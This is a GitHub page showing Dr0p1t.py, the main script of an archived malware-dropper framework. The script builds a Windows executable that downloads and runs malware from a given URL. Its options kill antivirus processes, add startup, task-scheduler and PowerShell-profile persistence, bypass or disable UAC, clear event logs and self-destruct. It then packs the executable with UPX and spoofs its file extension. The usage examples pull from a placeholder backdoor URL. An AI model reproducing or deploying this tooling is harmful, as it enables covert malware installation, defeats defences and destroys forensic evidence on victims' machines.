This repository has been archived by the owner on Feb 8, 2020. It is now read-only.
-
-
Notifications
You must be signed in to change notification settings - Fork 376
/
Dr0p1t.py
310 lines (264 loc) · 13 KB
/
Dr0p1t.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
#!/usr/bin/python3
#Written by: Karim shoair - D4Vinci ( Dr0p1t-Framework )
from core.banners import random_banner as banner
from core.color import *
from core.Phishing import *
from core import color,updater
import argparse ,os ,textwrap ,sys ,subprocess, shutil ,random
parser = argparse.ArgumentParser(
usage=argparse.SUPPRESS,
prog='Dr0p1t.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent( warn() ),
epilog="""\nExamples :
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
Note : Scripts like (bat\\ps1\\vbs) can only loaded from the scripts folder.
So if you wanna use custom scripts made by yourself,put it in the scripts folder.
"""
)
parser.add_argument("url", metavar='Malware_url',nargs="?", help="Url to your malware")
parser.add_argument("-s", action='store_true', help="Add your malware to startup (Persistence)")
parser.add_argument("-t", action='store_true', help="Add your malware to task scheduler (Persistence)")
parser.add_argument("-a", action='store_true', help="Add your link to powershell user profile (Persistence)")
parser.add_argument("-k", action='store_true', help="Kill antivirus process before running your malware.")
parser.add_argument("-b", help="Run this batch script before running your malware. Check scripts folder")
parser.add_argument("-p", help="Run this powershell script before running your malware. Check scripts folder")
parser.add_argument("-v", help="Run this vbs script before running your malware. Check scripts folder")
parser.add_argument("--runas",action='store_true', help="Bypass UAC and run your malware as admin")
parser.add_argument("--spoof", help="Spoof the final file to an extension you choose.")
parser.add_argument("--zip",action='store_true', help="Tell Dr0p1t that the malware in the link is compressed as zip")
parser.add_argument("--upx",action='store_true', help="Use UPX to compress the final file.")
parser.add_argument("--nouac",action='store_true', help="Try to disable UAC on victim device")
parser.add_argument("-i", help="Use icon to the final file. Check icons folder.")
parser.add_argument("--noclearevent",action='store_true', help="Tell the framework to not clear the event logs on target machine after finish.")
parser.add_argument("--nocompile",action='store_true', help="Tell the framework to not compile the final file.")
parser.add_argument("--only32",action='store_true', help="Download your malware for 32 bit devices only")
parser.add_argument("--only64",action='store_true', help="Download your malware for 64 bit devices only")
parser.add_argument("-q", action='store_true', help="Stay quite ( no banner )")
parser.add_argument("-u", action='store_true', help="Check for updates")
parser.add_argument("-nd", action='store_true', help="Display less output information")
args = parser.parse_args()
def PyInstaller():
if os.name=="nt":
installer = "pyinstaller"
else:
if sys.platform == "darwin": # On osx, the default .wine directory is located on $HOME/.wine/
installer = "wine " + os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe " + os.environ['HOME'] + "/.wine/drive_c/Python27/Scripts/pyinstaller-script.py"
else: #ToDo: find all defaults location for .wine , or request it directely to the user if not found.
installer = "wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py"
p = subprocess.Popen( installer + " -h",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE )
x = p.stdout.read().decode()
if x == "":
return False
elif x != "":
return True
def get_code(f):
code = open( f,"r" ).read()
return "\n"+code.split("#Start")[1]
def make_copy( old,new ):
old_file = open( old,"rb" )
new_file = open( new,"wb" )
old_data = old_file.read()
new_file.write( old_data )
old_file.close()
new_file.close()
def random_name():
return "Dr0pp1r" + str(random.randint(0,100))
def clear():
if os.name=="nt":
x=os.system("cls")
else:
x=os.system("clear")
def prepare_folder(folder):
x = shutil.rmtree(folder, ignore_errors=True)
xx = os.mkdir(folder)
xfx = open( os.path.join(folder,"README.md"),"w")
xfx.write("# Don't mess with this folder or delete it\n")
xfx.close()
def get_executable():
return os.listdir("dist")[0]
def main():
prepare_folder("temp")
prepare_folder("output")
clear()
if args.u:
updater.check()
sys.exit(0)
if not args.u:
if not args.url:
print( parser.print_help() )
x=sys.exit(0)
if not args.q:
banner()
if os.name=="nt":
installer = "pyinstaller"
exe = ""
else:
if sys.platform == "darwin": # On osx, the default .wine directory is located on $HOME/.wine/
installer = "wine " + os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe " + os.environ['HOME'] + "/.wine/drive_c/Python27/Scripts/pyinstaller-script.py"
else: # TODO: find all defaults location for .wine , or request it directely to the user if not found.
installer = "wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py"
exe = "wine "
url = args.url
p = "resources"
fullp = os.getcwd()
command = installer +" --noconsole -F --noupx {} "
bat_path = ["scripts","bat"]
ps1_path = ["scripts","powershell"]
vbs_path = ["scripts","vbs"]
f = ""
print_status(args)
colored_print( " [*] Creating DR0P3R..","g" )
f += "#!/usr/bin/python\n"
f += "# -*- coding: iso-8859-15 -*-\n"
f += 'import subprocess\n'
f += get_code( os.path.join(p,"pre_run.py") )+"\n"
#this functions for :
#get_output(cmd): to get output of command without using pipe to escape the fatal error after compiling !!
if args.k:
if not args.nd:
colored_print( " [*] Adding kill antivirus function..","g" )
f += get_code( os.path.join(p,"killav.py") )+"\n"
if sys.version_info[0]==3:
f += '\nfrom urllib.request import urlopen'
elif sys.version_info[0]==2:
f += '\nfrom urllib import urlopen'
if "http" not in url:
url = "http://"+url
if args.only32:
if args.zip:
f += get_code( os.path.join(p,"dropper.py") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n"
f += '\nfire_things_up("{}","32",True)\n'.format( url )
else:
f += get_code( os.path.join(p,"dropper.py") ).split("#Someshit")[0]
f += '\nfire_things_up("{}","32")\n'.format( url )
elif args.only64:
if args.zip:
f += get_code( os.path.join(p,"dropper.py") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n"
f += '\nfire_things_up("{}","64",True)\n'.format( url )
else:
f += get_code( os.path.join(p,"dropper.py") ).split("#Someshit")[0]
f += '\nfire_things_up("{}","64")\n'.format( url )
elif not args.only32 or not args.only64:
if args.zip:
f += get_code( os.path.join(p,"dropper.py") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n"
f += '\nfire_things_up("{}",False,True)\n'.format( url )
else:
f += get_code( os.path.join(p,"dropper.py") ).split("#Someshit")[0]
f += '\nfire_things_up("{}")\n'.format( url )
if args.runas:
f += get_code( os.path.join(p,"runas.py") )
else:
f += get_code( os.path.join(p,"dropper.py") ).split("#Someshit")[1]
if args.s:
if not args.nd:
colored_print( " [*] Adding startup function..","g" )
if "File = 'library.exe'" not in f:
f+="\nFile = 'library.exe'"
f += get_code( os.path.join(p,"add2startup.py") )+"\n"
if args.t:
if not args.nd:
colored_print( " [*] Adding task function..","g" )
if "File = 'library.exe'" not in f:
f+="\nFile = 'library.exe'"
f += get_code( os.path.join(p,"add2task.py") )+"\n"
if args.a:
if not args.nd:
colored_print( " [*] Adding add2profile function..","g" )
if "File = 'library.exe'" not in f:
f+="\nFile = 'library.exe'\n"
f += "\nlink='{}'".format(url)
f += get_code( os.path.join(p,"add2profile.py") )+"\n"
if args.b:
try :
if not args.nd:
colored_print( " [*] Adding runbat function..","g" )
bat_path.append(args.b)
ff = open( os.path.join(*bat_path ) ).read()
f += "\nBat_Script_Data = '''{}'''".format( ff )
f += get_code( os.path.join(p,"Runbat.py") )+"\n"
except:
colored_print( " [!] Error in reading bat file,are you sure it's in scripts folder ?","r" )
if args.p:
try :
if not args.nd:
colored_print( " [*] Adding runps1 function..","g" )
ps1_path.append(args.p)
ff = open( os.path.join(*ps1_path ) ).read()
f += "\nPs1_Script_Data = '''{}'''".format( ff )
f += get_code( os.path.join(p,"Runps1.py") )+"\n"
except :
colored_print( " [!] Error in reading ps1 file,are you sure it's in scripts folder ?","r" )
if args.v:
try :
if not args.nd:
colored_print( " [*] Adding runvbs function..","g" )
vbs_path.append(args.v)
ff = open( os.path.join(*vbs_path ) ).read()
f += "\nVbs_Script_Data = '''{}'''".format( ff )
f += get_code( os.path.join(p,"Runvbs.py") )+"\n"
except :
colored_print( " [!] Error in reading vbs file,are you sure it's in scripts folder ?","r" )
if args.nouac:
if not args.nd:
colored_print( " [*] Adding disable UAC function..","g" )
f += get_code( os.path.join(p,"Disable_UAC.py") )+"\n"
colored_print( " [*] Adding self destruct function..","g" )
f += get_code( os.path.join(p,"SelfDestruct.py") )+"\n"
if not args.noclearevent:
colored_print( " [*] Adding clear eventlog function..","g" )
f += get_code( os.path.join(p,"Clearev.py") )+"\n"
colored_print( " [*] Saving the final file..","g" )
file_name = random_name()
f+="\nx = subprocess.Popen( 'del out >> NUL',creationflags=subprocess.CREATE_NEW_CONSOLE, shell=True)"
os.chdir("temp")
fo = open( file_name+".py","w" )
fo.write(f)
fo.close()
if not args.nocompile:
if PyInstaller():
colored_print( " [*] Compiling the final file to exe..","g" )
if args.i:
if os.path.isfile( os.path.join(fullp,"icons",args.i) ):
if not args.nd:
colored_print( " [*] Adding icon to the final file..","g" )
command += "--icon=" + os.path.join(fullp,"icons",args.i)
else:
colored_print( " [!] Error in icon file,are you sure it's in icons folder ?","r" )
p = subprocess.Popen( command.format(file_name+".py"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(output, err) = p.communicate()
debug = output.decode() + "\n" + err.decode()
pw = p.wait()
if "Traceback" in debug:
f=open("debug.txt","w")
f.write(debug)
f.close()
colored_print( " [!] Error in compiling file [ See debug.txt file in temp folder ! ]","r" )
sys.exit(0)
file_name = get_executable()
if args.upx:
if not args.nd:
colored_print( " [*] Compressing the final file..","g" )
x = subprocess.Popen(exe + os.path.join("utils","upx.exe") +" -9 "+os.path.join("output",file_name) ,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE )
os.chdir("..")
make_copy( os.path.join("temp","dist",file_name),os.path.join("output",file_name) )
if args.spoof:
if not args.nd:
colored_print( " [*] Spoofing the final file extension..","g" )
if Spoof_extension(os.path.join("output",file_name),args.spoof):
colored_print( " [*] File extension spoof complate !","g" )
else:
colored_print( " [!] File extension spoof failed !","r" )
else:
colored_print( " [!] PyInstaller not installed : Can't compile file to exe..","r" )
elif args.nocompile:
file_name = file_name+".py"
os.chdir("..")
blah = os.rename( os.path.join( "temp",file_name ),os.path.join( "output",file_name ) )
colored_print( " [*] Finished and saved our Dr0pp3r as "+file_name+" in output folder ( happy hunting )","m" )
if __name__ == '__main__':
main()